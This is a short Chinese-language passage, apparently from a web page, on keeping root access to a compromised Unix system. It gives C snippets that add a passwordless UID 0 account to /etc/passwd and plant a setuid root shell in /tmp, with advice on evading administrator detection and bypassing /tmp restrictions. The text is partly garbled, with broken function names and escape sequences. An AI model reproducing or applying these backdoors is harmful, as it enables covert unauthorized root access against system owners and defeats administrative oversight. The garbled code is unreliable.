思路方法
就是在口令文件 passwd 中增加
个 UID 为 0 帐号
但最好别这么做
只要系统管理员检查口令文件就会“漏馅”了以下是在 /etc/passwd 口令文件中添加个 UID 0 帐号C
<
> backdoor/backdoor1.c#
{
FILE *fd;
fd=fopen("/etc/passwd","a+");
fpr
f(fd,"hax0r::0:0::/root:/bin/shn");}
<-->
比这种思路方法稍微隐蔽
点就是将藏在口令文件中某个无人使用帐号 UID 改为 0并将其第 2个域(口令域)设为空(注意如果你使用是较高版本*nix也许还要修改 /etc/shadow 文件)在 /tmp 目录下放置 suid shell
以后只要你运行这个就会轻易得到根用户权限这种思路方法几乎是最受欢迎了但有许多系统每几小时或者每次启动都会清除 /tmp 目录下数据另外些系统则根本不允许运行 /tmp 目录下 suid 当然你可以自己修改或清除这些限制(你已是根用户有权限修改 /var/spool/cron/crontabs/root 和 /etc/fstab 文件)以下是在 /tmp 目录下放置 suid shell C源<
> backdoor/backdoor2.c#
{
system("cp /bin/sh /tmp/fid");
system("chown root.root /tmp/fid");
system("chmod 4755 /tmp/fid");
}
<-->
最新评论